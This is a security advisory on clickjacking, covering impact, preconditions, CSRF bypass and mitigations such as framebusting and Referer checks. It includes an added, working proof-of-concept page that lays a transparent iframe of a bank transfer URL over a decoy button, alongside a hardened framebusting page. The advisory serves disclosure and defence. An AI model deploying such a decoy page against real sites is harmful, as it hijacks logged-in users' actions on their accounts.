Clickjacking

Friday, October 24, 2008

Priority: MEDIUM

Impact:
A malicious website can trick a user into performing complex actions on an innocent website, effectively hijacking the user's account for a limited time.

Resolution:
Clickjacking can only be solved by the browser vendors. However, these preventative actions can be taken now:

  1. Individual users should consider using the Mozilla Firefox browser with the NoScript plug-in installed.
  2. System administrators should be on the lookout for suspicious activity in user accounts.
  3. Where possible, websites should be upgraded to use framebusting.

Who:
Any organization with a website that allows users to have individual accounts is vulnerable, but those where the accounts protect something of high value—bank accounts, credit card numbers, health insurance records—are the most likely targets.

What:
Clickjacking is a new name, but the problem itself was known as early as 2002. However, the full impact of this issue has only come to light recently.

At the core of this problem is the ability of one website to display fragments of another website within its own pages. Without reading the underlying code, users cannot tell which parts of what they see come from the site they are visiting and which do not. Although this ability has security implications, it has long been an integral part of the web, and many websites use it for legitimate reasons.

A clickjacking attack is exactly what it sounds like: a click, on what a user thinks is a separate third-party website, is hijacked and actually turned into a click on a website where the user already has an account.

How:
A clickjacking attack can be executed in a number of slightly different ways. One method involves tricking an innocent user into clicking on a button on another website:

  1. The attackers create a web page that embeds the page of the target website containing the button they want the user to click. In HTML, this is done using an inline frame (iframe).
  2. The frame is hidden by making it fully transparent. Although it can no longer be seen, its content remains active: a user can still click any button in it, provided the click lands in exactly the right place. The attackers know the coordinates of the button on the target page, so all they need to do is make the user click at that location.
  3. The attackers add a button of their own and position it directly beneath the invisible target button, with the transparent frame layered on top. Because the real button is invisible, the user sees only the attacker's button. A click on what looks like a button on the attacker's page actually lands on the button in the target website, and the attack succeeds.
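The three steps above as a single page, added here as an illustration; it is not part of the original advisory. The target URL, the position of the real button inside the target page (600 px from the left, 450 px from the top) and the position of the decoy are assumptions chosen for the example; a real attack would measure them against the actual target page.

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Claim your prize</title>
  <style>
    body { margin: 0; }

    /* Step 3: the decoy button the victim actually sees (assumed position). */
    #decoy {
      position: absolute;
      top: 300px;
      left: 200px;
      width: 120px;
      height: 40px;
    }

    /* Steps 1 and 2: the target page in a frame, shifted so that its real button
       (assumed to sit at x=600, y=450 inside the target page) lands exactly on the
       decoy: left = 200 - 600 = -400, top = 300 - 450 = -150. */
    #target {
      position: absolute;
      top: -150px;
      left: -400px;
      width: 1200px;
      height: 900px;
      border: none;
      z-index: 2;                  /* layered on top of the decoy */
      opacity: 0;                  /* fully transparent, still receives clicks */
      filter: alpha(opacity=0);    /* same effect for Internet Explorer of the period */
    }
  </style>
</head>
<body>
  <p>You have been selected! Click the button to claim your prize.</p>
  <button id="decoy">Claim prize</button>

  <!-- Hypothetical target: a page on which the logged-in victim can complete a
       sensitive action with one click. The URL is an assumption for the example. -->
  <iframe id="target"
          src="https://bank.example/transfer?to=attacker&amount=1000"
          scrolling="no"></iframe>
</body>
</html>
```

Because the frame is on top and transparent, the victim's click at the decoy's location is delivered to the framed page, which sends the request with the victim's own cookies; the decoy button itself is never clicked. Adjusting the frame offsets is the only tailoring required for a different target page.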

Impact:
Although it is relatively easy to get users to do something without being aware of their actions, there are preconditions to the overall success of this attack:

  1. The attacker must get the user to the malicious website. This is typically done via email, social engineering or by (real) compromise of popular websites.
  2. The attacker must be able to load the relevant page of the target website inside the frame. There are two obstacles to this:
  • In most cases, the victim must already be logged in to the target website.
  • Reaching the right page may require a multi-step process, so it may not be possible to load the target page directly even when the user is logged in. In this case the attacker would have to hijack several clicks in sequence to lead the user through the process. It is not yet clear whether interactions other than clicks can be hijacked. The complexity of chaining many steps makes such exploitation difficult, but short sequences (for example, a "delete" action followed by a click on the "Yes" button that confirms it) could be relatively straightforward to execute.

Some browser components, most notably the Adobe Flash Player plug-in, can be abused relatively easily. In that case the attacker targets the user directly rather than an account on a website: clicks in the Flash Player settings dialog can be hijacked to grant a site access to the user's webcam and microphone. Adobe has released an updated version of Flash Player that addresses this, and all users are advised to upgrade as soon as they can.

Risk:
Attacks against users are easy to carry out because an exploit, once available in the wild, is easy to replicate on a number of malicious websites. Thus, the severity for Internet users is HIGH.

To organizations, clickjacking is a serious threat because it bypasses the cross-site request forgery (CSRF) defenses that might already be in place: the request is submitted by the user's own browser from the target's own page, so any anti-CSRF token is present and valid. Because clickjacking attacks must be tailored to each specific target, and the target's usage patterns must be favorable to make attacks feasible, we are categorizing this as a MEDIUM severity issue.

Resolution:
Clickjacking is difficult to defend against because it is a client-side (browser) problem. Only a coordinated action of major browser vendors can ultimately fix this issue. In the meantime:

  1. Individual users should consider using the Mozilla Firefox browser with the NoScript plug-in installed. This combination is known to defeat clickjacking. It is not known at this time if other browser vendors have plans to address this issue.
  2. System administrators in charge of application security should be on the lookout for suspicious activity in user accounts (e.g. through real-time website monitoring).
  3. Website and web application developers should consider implementing one of the following options:
  • Upgrading sites to use framebusting, a technique that prevents site pages from being displayed within frames on other websites.
  • Requiring users to re-authenticate for every significant action (e.g. a money transfer).
  • Checking the Referer request header to detect when a page is first opened in the context of another site, and refusing to serve the private areas of the site to requests whose Referer belongs to another site or is missing. This type of protection cannot be applied to pages that must be publicly accessible, and because some browsers, proxies and privacy tools strip the Referer header, rejecting requests without one will also turn away some legitimate users.
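A framebusting page, as an added example rather than code from the advisory. The script is the classic check that the page is the top-level document; in addition, the page hides its content by default and only reveals it once that check passes, so that if the busting script is blocked or defeated the victim is left with a blank, unclickable frame rather than a live page. The page path and the form are placeholders.

```html
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>Account settings</title>

  <!-- Hide the whole document until the script confirms it is not framed. -->
  <style id="antiClickjack">html { display: none !important; }</style>

  <script>
    (function () {
      if (self === top) {
        // Not framed: remove the hiding rule and show the page as normal.
        var hide = document.getElementById("antiClickjack");
        hide.parentNode.removeChild(hide);
      } else {
        // Framed: classic framebusting, replace the framing page with ourselves.
        try {
          top.location.href = self.location.href;
        } catch (e) {
          // Navigating the top window failed or was blocked by the framing page;
          // the document stays hidden, so there is nothing for a victim to click.
        }
      }
    })();
  </script>
</head>
<body>
  <h1>Account settings</h1>
  <!-- Placeholder for a one-click sensitive action worth protecting. -->
  <form method="post" action="/account/delete">
    <button type="submit">Delete my account</button>
  </form>
</body>
</html>
```

The hide-by-default step matters because a framing page can interfere with a bare `top.location` redirect (for example by cancelling the navigation from an unload handler, or by preventing the framed page's script from running); the bare one-liner alone should be treated as a stopgap. Browsers released after this advisory added a response header by which a server declares that a page must not be framed (X-Frame-Options, and later the Content-Security-Policy frame-ancestors directive), which is the preferred control wherever the user base's browsers support it.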

Contact
For more information on this alert, please email support@breach.com.